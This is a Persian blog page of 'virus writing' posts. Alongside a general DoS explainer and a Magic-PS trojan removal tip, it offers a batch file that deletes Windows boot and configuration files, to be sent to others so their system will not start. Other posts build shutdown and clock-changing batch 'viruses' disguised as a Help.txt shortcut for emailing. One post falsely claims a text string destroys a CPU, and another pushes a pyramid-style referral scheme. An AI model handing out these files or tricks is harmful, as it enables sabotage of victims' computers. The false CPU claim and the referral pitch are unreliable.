تبلیغات
Learn EveryThing - مطالب ویروس نویسی (مخصوص كاربران حرفهای)
 
درباره وبلاگ


بهترین ها در وبلاگ ما


مدیر وبلاگ : Ali Noori
آمار وبلاگ
  • کل بازدید :
  • بازدید امروز :
  • بازدید دیروز :
  • بازدید این ماه :
  • بازدید ماه قبل :
  • تعداد نویسندگان :
  • تعداد کل پست ها :
  • آخرین بازدید :
  • آخرین بروز رسانی :
Learn EveryThing
قدرتمندترین وبلاگ آموزشی و دانلود نرم افزار ایرانیان
صفحه نخست             تماس با مدیر           پست الکترونیک               RSS                  ATOM
جمعه 19 تیر 1388 :: نویسنده : Ali Noori

قصد داریم تا طی چند مقاله با نوعی از حمله به نام DoS آشنا شویم که مخفف عبارتDenial-of-Service یا عدم پذیرش سرویس است. این نوع حمله باعث از کارافتادن یا مشغول شدن بیش از اندازه کامپیوتر می شود تا حدی که غیرقابل استفاده می شود. در بیشتر موارد، حفره های امنیتی محل انجام این حملات است و لذا نصب آخرین وصله های امنیتی از حمله جلوگیری خواهند کرد. شایان گفتن است که علاوه بر اینکه کامپیوتر شما هدف یک حمله DoS قرار می گیرد، ممکن است که در حمله DoS علیه یک سیستم دیگر نیز شرکت داده شود. نفوذگران با ایجاد ترافیک بی مورد و بی استفاده باعث می شوند که حجم زیادی از منابع سرویس دهنده و پهنای باند شبکه مصرف یا به نوعی درگیر رسیدگی به این تقاضاهای بی مورد شود و این تقاضا تا جایی که دستگاه سرویس دهنده را به زانو در آورد ادامه پیدا می کند. نیت اولیه و تأثیر حملات DoS جلوگیری از استفاده صحیح از منابع کامپیوتری و شبکه ای و از بین بردن این منابع است.

علیرغم تلاش و منابعی که برای ایمن سازی علیه نفوذ و خرابکاری مصروف گشته است، سیستم های متصل به اینترنت با تهدیدی واقعی و مداوم به نام حملات DoS مواجه هستند. این امر بدلیل دو مشخصه اساسی اینترنت است:

· منابع تشکیل دهنده اینترنت به نوعی محدود و مصرف شدنی هستند.

زیرساختار سیستم ها و شبکه های بهم متصل که اینترنت را می سازند، کاملاً از منابع محدود تشکیل شده است. پهنای باند، قدرت پردازش و ظرفیت های ذخیره سازی، همگی محدود و هدف های معمول حملات DoS هستند. مهاجمان با انجام این حملات سعی می کنند با مصرف کردن مقدار قابل توجهی از منابع در دسترس، باعث قطع میزانی از سرویس ها شوند. وفور منابعی که بدرستی طراحی و استفاده شده اند ممکن است عاملی برای کاهش میزان تاثیر یک حمله DoS باشد، اما شیوه ها و ابزار امروزی حمله حتی در کارکرد فراوان ترین منابع نیز اختلال ایجاد می کند.

· امنیت اینترنت تا حد زیادی وابسته به تمام عوامل است.

حملات DoS معمولاً از یک یا چند نقطه که از دید سیستم یا شبکه قربانی عامل بیرونی هستند، صورت می گیرند. در بسیاری موارد، نقطه آغاز حمله شامل یک یا چند سیستم است که از طریق سوءاستفاده های امنیتی در اختیار یک نفوذگر قرار گرفته اند و لذا حملات از سیستم یا سیستم های خود نفوذگر صورت نمی گیرد. بنابراین، دفاع برعلیه نفوذ نه تنها به حفاظت از اموال مرتبط با اینترنت کمک می کند، بلکه به جلوگیری از استفاده از این اموال برای حمله به سایر شبکه ها و سیستم ها نیز کمک می کند. پس بدون توجه به اینکه سیستم هایتان به چه میزان محافظت می شوند، قرار گرفتن در معرض بسیاری از انواع حمله و مشخصاً DoS ، به وضعیت امنیتی در سایر قسمت های اینترنت بستگی زیادی دارد.

مقابله با حملات DoS تنها یک بحث عملی نیست. محدودکردن میزان تقاضا، فیلترکردن بسته ها و دستکاری پارامترهای نرم افزاری در بعضی موارد می تواند به محدودکردن اثر حملات DoS کمک کند، اما بشرطی که حمله DoS در حال مصرف کردن تمام منابع موجود نباشد. در بسیاری موارد، تنها می توان یک دفاع واکنشی داشت و این در صورتی است که منبع یا منابع حمله مشخص شوند. استفاده از جعل آدرس IP در طول حمله و ظهور روش های حمله توزیع شده و ابزارهای موجود یک چالش همیشگی را در مقابل کسانی که باید به حملات DoS پاسخ دهند، قرار داده است.

تکنولوژی حملات DoS اولیه شامل ابزار ساده ای بود که بسته ها را تولید و از «یک منبع به یک مقصد» ارسال می کرد. با گذشت زمان، ابزارها تا حد اجرای حملات از «یک منبع به چندین هدف»، «از چندین منبع به هدف های تنها» و «چندین منبع به چندین هدف»، پیشرفت کرده اند.

امروزه بیشترین حملات گزارش شده به CERT/CC مبنی بر ارسال تعداد بسیار زیادی بسته به یک مقصد است که باعث ایجاد نقاط انتهایی بسیار زیاد و مصرف پهنای باند شبکه می شود. از چنین حملاتی معمولاً به عنوان حملات طغیان بسته (Packet flooding) یاد می شود. اما در مورد «حمله به چندین هدف» گزارش کمتری دریافت شده است.

انواع بسته ها (Packets) مورد استفاده برای حملات طغیان بسته ، در طول زمان تغییر کرده است، اما چندین نوع بسته معمول وجود دارند که هنوز توسط ابزار حمله DoS استفاده می شوند.

· طغیان های TCP: رشته ای از بسته های TCP با پرچم های ( flag ) متفاوت به آدرس IP قربانی فرستاده می شوند. پرچم های SYN، ACK و RST بیشتر استفاده می شوند.

· طغیان های تقاضا\پاسخ ICMP (مانند طغیان های ping): رشته ای از بسته های ICMP به آدرس IP قربانی فرستاده می شود.

· طغیان های UDP: رشته ای از بسته های UDP به آدرس IP قربانی ارسال می شوند.


در مقالات بعدی به بررسی بیشتر حملات DoS خوهیم پرداخت.





نوع مطلب : اخبار روز، عمومی، ترفندهای ویندوز و موبایل و ...، ویروس نویسی (مخصوص كاربران حرفهای)، هك و بوت، 
برچسب ها :
لینک های مرتبط :


یکشنبه 24 خرداد 1388 :: نویسنده : Ali Noori
مطمئنأ اکثر کسانی که با مقوله هک و امنیت آشنا هستند نام تروجان معروف Magic-PS را شنیده اند. این تروجان موجب دزدیده شدن پسورد کاربران پس از اجرا میشود و میتواند به سادگی پسورد یاهو شما را برای تروجان ساز ارسال کند. در این ترفند قصد داریم روشی را به شما معرفی کنیم که با بهره گیری از آن میتوانید کار این تروجان را کاملا ساقط کنید و خیال خود را از هک شدن بدین وسیله راحت کنید.

بدین منظور:
از منوی Start وارد Run شده  و در آن عبارت regedit را وارد کرده و Enter بزنید تا ویرایشگر رجیستری ویندوز باز شود.
سپس به آدرس زیر بروید:

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/RunOnce

سپس از قسمت دیگر پنجره، دنبال متغیری با نام SVCHOST یا svchost بگردید و در صورت وجود با راست کلیک بر روی آن و انتخاب Delete آن را حذف کنید.
همین عمل را در آدرس زیر نیز اعمال کنید:

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run

در پایان سیستم را مجددأ راه اندازی کنید.

این ترفند بر روی نسخه 1.5 یا پایین تر نرم افزار Magic-PS عمل میکند.



نوع مطلب : ترفندهای ویندوز و موبایل و ...، ویروس نویسی (مخصوص كاربران حرفهای)، هك و بوت، 
برچسب ها :
لینک های مرتبط :


جمعه 29 آذر 1387 :: نویسنده : Ali Noori

سایتی ایرانی و فوق العاده

پیشنهاد میکنم حتما ثبت نام کنید چون این سایت به تنهایی می تواند منجر به تحول اساسی در زندگی مادی شما شود.

عضویت در سایت: برای این کار به سایت ایران بین به آدرس http://www.iranbin.com/ رفته و در قسمت چپ سایت به روی لینک متقاضی بازاریابی هستم کلیک می کنید و وارد مراحل ثبت نام می شوید و فرم های مورد نظر را به طور کامل و دقیق و صحیح پر می کنید(قابل توجه که عضویت در سایت نیاز به پرداخت هیچ پولی ندارد و کاملاً رایگان است و همین مطلب علت قانونی بودن آن است) و در قسمت شناسه معرف شناسه من یعنیALNO002910001 نوشته و در قسمت تعیین موقعیت سمت چپ  یآ راست را انتخاب می کنید این بستگی به ترتیب قرارگرفتن زیرمجموعه های شما دارد یعنی به ترتیب یگی در چپ و یکی در راست و هر جفت زیرمجموعه ای که معرفی کنید۲۰۰۰ تومان میگیرید و قسمت شناسه سر گروه را خالی می گذارید(این قسمت اختیاری است و مشخص میکند که شما دقیقاً در ردیف پایین چه کسی قرار بگیرید که هیچ تاثیری در کار شما نخواهد داشت)


بعد از اتمام مراحل ثبت نام برای شما ایمیلی فرستاده می شود که حاوی  شناسه شما می باشد و بعد از این شما عضو معمولی سایت هستید و می توانید با این شناسه و کلمه عبور انتخاب شده وارد صفحه شخصی خود شوید که در این صفحه شما میتوانید میزان موجودی و تعداد زیر مجموعه ها و... را ببینید.

 یكی از دوستانم در این سایت از تازیخ 5/86 تا 2/87 مبلغ ۳۰٬۰۰۰٫۰۰۰ ریال = ۳ میلیون تومان كسب كرده است كه حتی مدرك آن هم به من نشان داد و مدرك مهمتر آنكه وضع مالی او ناگهان عوض شد و خیلی از وسایل یا كار هایی كه می خواست بخرد و  انجام دهد را با همین پول انجام داد ، این دوستم یكی از دوستان نزدیكه من بود كه من هم از طریق او به تازگی ثبت نام كردم  .


امیدوارم پیروز و سربلند باشید .

علی نوری







نوع مطلب : ویروس نویسی (مخصوص كاربران حرفهای)، 
برچسب ها :
لینک های مرتبط :


یه  Text Document  باز کنید و بعد این کامند رو توش بنویسید :

                                          

:c

del autoexec.bat

del config.sys

cd winnt

del system.ini

del win.ini

بعد فایل رو با پسوند bat  .سیو کنید.

مثل این : nofooz.bat

این فایل رو وقتی برای  کسی بفرستید هیچی نمیشه  ولی وقتی اجراش کنه و کامپیوترش رو ریست کنه دیگه ویندوزش بالا نمیاد .

من ویروس رو برای راحتی کارتون گذاشتم ولی مواظب باشید خودتون اجراش نکنید .

این یک فرمان CMD است و هیچ آنتی ویروسی آن را نمیشناسد .





نوع مطلب : ویروس نویسی (مخصوص كاربران حرفهای)، 
برچسب ها :
لینک های مرتبط :


. روی دسک تاپ رایت کلیک کنید وازگزینه ی new - text document را انتخاب کنید.

2. حالا وارد text document  شوید ودر آن عبارت زیررا تایپ کنید.

cpu_567hjkblaster

3. بعد از سیو کردن آنرا rename   کرده و اسمی برایش انتخاب کنید.

حالا اگه فایل رو اجرا کنید باید فاتحه ی cpu رو بخونین.

روی بعضی از رایانه ها پاسخ نمی دهد .





نوع مطلب : ویروس نویسی (مخصوص كاربران حرفهای)، 
برچسب ها :
لینک های مرتبط :


جمعه 30 فروردین 1387 :: نویسنده : Ali Noori

Firefox محصولی از كمپانی Mozilla مرورگری امن، مطرح، قدرتمند و با امكانات فراوان و سرعت بالاست. این مرورگر محبوب را به خاطر كیفیت و كارایی بالایش هم ردیف سایر مرورگرهای مطرح دنیا مانند Internet Explorer و Opera و شاید بهتر از آنها در بعضی امكانات نسبت به شده است.

قابلیت های كلیدی نرم افزار Mozilla Firefox 2.0.0.14 Final :
- سرعت بالا در بارگذاری صفحات
- دارای قابلیت ‏Tabbed Browsing (باز شدن صفحات متعدد در یك پنجره)
- امنیت بالا در محیط نا امن اینترنت
- جلوگیری از خطرات احتمالی Spy-Ware ها و سارقان اینترنتی
- جلوگیری از باز شدن صفحات تبلیغاتی بی مورد (Popup - bloker)
- محافظت از پسوردها و رمز های عبور خصوصی و امنیتی
- زیبایی در طراحی
- دارای پوسته های مختلف
- قابلیت نصب پلاگین های مختلف برای عملكرد بهتر
- پشتیبانی از تمام نسخه های ویندوز از جمله ویندوز ویستا
- و ...


توانایی های مرورگر در یک نگاه:

- Enjoy a Better Web Experience:
Firefox 2 اکنون با ارائه ی قابلیت هایی مفید و کارآمد سعی در سودمند کردن تجربه ی internet ی شما دارد.
- Stay Secure on the Web:
Firefox همچنان به پیشقدم بودن خود در راه ارئه ی امنیت برای کاربران online خود پرداخته و اکنون با پشتبانی فعال خود  امنیتی فراوان را برای شما فراهم کرده است.
- Personalize Your Browser:
اکنون شما قابلیت انتخاب هزاران ویزگی مفید برای اضافه کردن به Firefox را داشته و شخصی سازی برای شما به گونه ای فراهم شده است که گویی مرورگر را خود شما طراحی کرده اید.

دانلود - نسخه ویندوز - 5.8 مگابایت
دانلود برای زبان ها و سیستم عامل های مختلف
افزونه های فایر فاکس
سایت سازنده
لینک منب





نوع مطلب : ویروس نویسی (مخصوص كاربران حرفهای)، 
برچسب ها :
لینک های مرتبط :


قسمت اول ویروس بلاستر: امروز یادمیگیریم كه: 1- چگونه ویروس Blaster را بسازیم 2- چگونه برای BatchFile ها آیكون بسازیم 3- چگونه خودمان در Notepad ترفند كشف كنیم!!! فكر میكنم همه شما ویروس Blaster را بشناسید ویروسی كه باعث Shutdown شدن كامپیوتر در 60 ثانیه میشد... و حتی عده كثیری از شما روش ساخت آن را بدانید ولی در پایان این سری مقالات و جهت تكمیل این سری از مقالات لازم میدانم نگاهی سریع به آن بیندازیم و سپس به نكات تكمیلی این سری مقالات میپردازیم. این ویروس را به طرق مختلفی و با دستورات گوناگونی میتوان نوشت كه در اینجا دو روش را مورد بررسی قرار میدهیم در ضمن لطفا اگر با این دستورات از قبل آشنایی ندارید حتما از Copy/Paste استفاده كنید . روش اول/ با استفاده ازShortcut در جایی از دسكتاپ خود Right Click كنید و در بخش New گزینه Shortcut را انتخاب كنید و در بخش ظاهر شده یكی از دستورات زیر را وارد كنید: shutdown -s -t xx -1 windir%system32shutdown.exe -s -t xx% -2 توضیح: بعد از اینكه Paste كردید به جای xx در دستورات بالا مدت زمانی را بر حسب ثانیه قرار دهید تا كامپیوتر پس از آن زمان خاموش شود. سپس Next را بزنید و برای فایل خود یك نام برگزینید و كار تمام است!!. روش دوم/ به كمكNotepad نت پد را باز كنید و باز هم یكی از دو دستور بالا را در آن Paste كنید و حالا فایل خود را با پسوند bat یعنی با نامی مثل shutdown.bat سیو كنیدفكر میكنم تا به حال باید متوجه شده باشید كه bat مخفف BatchFile است. برای پادزهر درست كردن برای این ویروس هم میتوانید از دستور زیر استفاده كنید: shutdown -a و همه مراحل قبل را انجام دهید. این دستور هم از هر دو راه فوق قابل اجرا است. حالا میرسیم به نكات تكمیلی در مورد مقالات این یك هفته: خیلی ها سوال میكنند كه چگونه میتوان برای BatchFile ها آیكون انتخاب كرد. باید بگویم یكی از ساده ترین روشها كه به هیچ نرم افزار خاصی نیاز ندارد این است كه شما از BatchFile مورد نظر یك Shortcut بسازید و برای Shortcut براحتی آیكون انتخاب كنید و فایل اصلی را Hidden كنید . تا به حال هیچ به این فكر افتاده اید كه اگر در كامپیوتری Notepad و Wordpad و Microsoft Word نصب نشده باشد شما این همه ترفند را كجا میخواهید پیاده كنید؟؟؟!!!. آیا میدانید هكرها معمولا در محیط متنی دیگری بجز اینها اقدام به نوشن برنامه میكنند؟؟. بله این محیط متنی به نسبت ناشناخته همان ادیتور داس Dos Editor است. شما در این ادیتور میتوانید كد برنامه ها را ببینید!. برای وارد شدن به این محیط وارد داس شوید و تایپ كنید Edit صبر كنید!!!قبل از اینكه وارد این محیط شوید باید بدانید بر خلاف محیط بی آزار نت پد محیط Dos Editor بسیار بسیار خطرناك است. هرگونه تغییری كه خواسته یا ناخواسته در متن كد ها بوجود آورید امكان هیچگونه بازگشت ندارد اینجا از كلیدی به نام Undo خبری نیست!! همچنین همه تغییرات بطور خودكار سیو میشود و هیچگاه موقع خروج از ادیتور ازشما سوال نمیشود كه Do you want to save changes و همه چیز بطور خودكار ذخیره شده و اگر احیانا كد فایل های اصلی سیستم را دستكاری كنید حتی System Restore و Backup های رجیستری هم به دادتان نخواهند رسید... اما برای اینكه كار با ادیتور آشنا شوید و خودتان ترفندی كشف كنید مطابق زیر عمل كنید: 1- وارد داس شوید و تایپ كنید Edit تا وارد ادیتور شوید كه صفحه ای آبی رنگ است 2- از منوی بالای صفحه File را انتخاب و روی Open كلیك كنید. 3- به این مسیر بروید:C / WINDOWS و در پنجره سمت چپ دنبال فایلی به نام explorer.scf بگردید اگر یادتان باشد شما در مقالات قبلی فایل دیگری را نیز با پسوند scf ساخته بودید... یادتان می آید؟؟آیكون Show Desktop بود. 4- متنی كه در آن میبینید را عینا درون Notepad وارد كنید و فایل خود را باهمان پسوند scf سیو كنید. به این طریق برنامه explorer.scf بر روی صفحه ظاهر میشود.. بله شما اولین ترفند خود را خودتان ساختید!!! به این وسیله شما میتوانید خودتان در Notepad ترفند كشف كنید!!!! من هم به همین طریق این ترفندها را برای شما می نوشتم.



نوع مطلب : ویروس نویسی (مخصوص كاربران حرفهای)، 
برچسب ها :
لینک های مرتبط :


شنبه 27 مرداد 1386 :: نویسنده : Ali Noori

بله امروز قرار است Notepad را از دیدگاه یك هكر نگاه كنیم و با هم ویروسی واقعی بسازیم نام این ویروس را Help میگذاریم البته نام اصلی آن ZeroZone است و آن را تا مرحله فرستادن با ایمیل پیش ببریم. همچنین بعد از ساختن آن سعی میكنیم بوسیله چیزهایی كه در قسمت های قبل یاد گرفته ایم ویروسمان را قوی تر كنیم. خلاصه امروز میخواهیم ببینیم یك هكر واقعا چه كار میكند. امروز ویروسی به كمك Batch File ها مینویسیم. برنامه نویسی به وسیله Batch File بسیار مفصل است و ما امروز چند دستور مقدماتی از آن را مورد بررسی قرار میدهیم و البته با آن برنامه كاملی خواهیم نوشت. دستوراتی كه مورد بررسی قرار میدهیم عبارتند از Echo و Date و Time در ضمن بهتراست بدانید ما برای ساخت این ویروس از 4 فایل نت پد استفاده خواهیم كرد...
حالا میرسیم به شروع كار: دستور Time همانطور كه از نامش پیداست ساعت كامپیوتر را نشان میدهد برای اینكه منظورم را بهتر بفهمید وارد محیط Dos شوید و تایپ كنید Time حال notepad را باز كنید و درون آن عبارت زیر را در آن Paste كنید
Echo off@
time=0:0:0

منظورم را از خط اول فرمان را بعدا توضیح میدم .حال فایل خود را با پسوند bat یعنی با نامی مانند Time0 سیو كنید. حال فایل نت پد دیگری باز كنید و دستور زیر را در آن Paste كنید:
@ECHO OFF
date=10-10-10

این فایل را هم مثل فایل قبلی سیو كنید یعنی با نامی مثل Date0.bat.
توضیح:دستور Echo وظیفه دارد به كاربر مرتبا نمایش دهد كه چه فعالیتی در حال اجراست و همانطور كه میبینید ما در اول هر دستور آن را خاموش كرده ایم تا دستورات تایپ شده در موقع اجرا روی صفحه نمایش نیابد و اصطلاحا كد برنامه ما لو نرود.
حال فایل دیگری باز كنید و در آن عبارت زیر را Paste كنید:
@echo off
echo I AM A VIRUS
echo SEAT AND SEE MY POWER!!!...
pause

ویروس نویسان معمولا این پیغام های مثلا ترسناك را هم ضمیمه میكنند تا در موقع اجرای برنامه روی صفحه ظاهر شود....
توضیح: دستور Pause هم یكی دیگر از دستورات است كه اجازه میدهد یك نوشته روی صفحه باقی بماند تا كسی آنرا بخواند. این فایل را هم مانند فایل های قبلی سیو كنید با نامی شبیه Comment.bat سیو كنید. حال ما باید كاری كنیم تا همه این BatchFile هایی كه ساخته ایم با هم عمل كنند. و حالا باید از آیكون چند كاره كمك بگیریم. پس فایل دیگری باز كنید و در آن عبارت زیر را Paste كنید:
START TIME0
START DATE0
START comment

و آن را با نام Help و با پسوند bat سیو كنید.حال میرسیم به اینكه چطور برای فایل آخرمان آیكون انتخاب كنید. برای این كار باید از همین فایل آخرمان یك Shortcut بسازیم و نام آن را به Help.txt تغییر دهید و سپس برای این shortcut آیكونی مناسب با نام آن انتخاب كنید. حال همه فایلهایی كه ساخته اید را درون یك Folder قرار دهید و غیر از آن Shortcut بقیه فایلها را Hidden كنید تا دیده نشوند. كار به پایان رسید. خسته نباشید. حالا برای رفع خستگی هم كه شده حرفهای زیر را بخوانید:
حرف1: شما میتوانید برای زیاد كردن پیاز داغ قضیه ویروس نمای Eicar را هم به فایل خود پیوسیت كنید.
حرف2: برای اینكه عملكرد Echo را كاملا متوجه شوید .هه كارهای بالا را دوباره انجام دهید ولی خطوط اول دستورات را كه مربوط echo است پاك كنید.
حرف3: همانطور كه دیدید این ویروسی كه خودتان نوشتید كار خطرناكی انجام نمیدهد فقط ساعت كامپیوتر را reset میكند و تاریخ را به 2010/10/10 تغییر میدهد. بنابراین شما بدون اینكه بترسید میتوانید آن را روی كامپیوتر خودتان امتحان كنید.
حرف4: شما امروز دقیقا مثل هكرها یك ویروس نوشتید. البته هرچه دانش شما در رابطه با زبان های برنامه نویسی بیشتر باشد كارهای بیشتر ی هم میتوانید انجام دهید.
حرف5: اگر میخواهید لیست كاملی از دستورات BatchFile Programming را ببینید داخل Dos بروید و تایپ كنید Help





نوع مطلب : ویروس نویسی (مخصوص كاربران حرفهای)، 
برچسب ها :
لینک های مرتبط :




( کل صفحات : 2 )    1   2   
 
 
برچسب ها
پیوندها
آخرین مطالب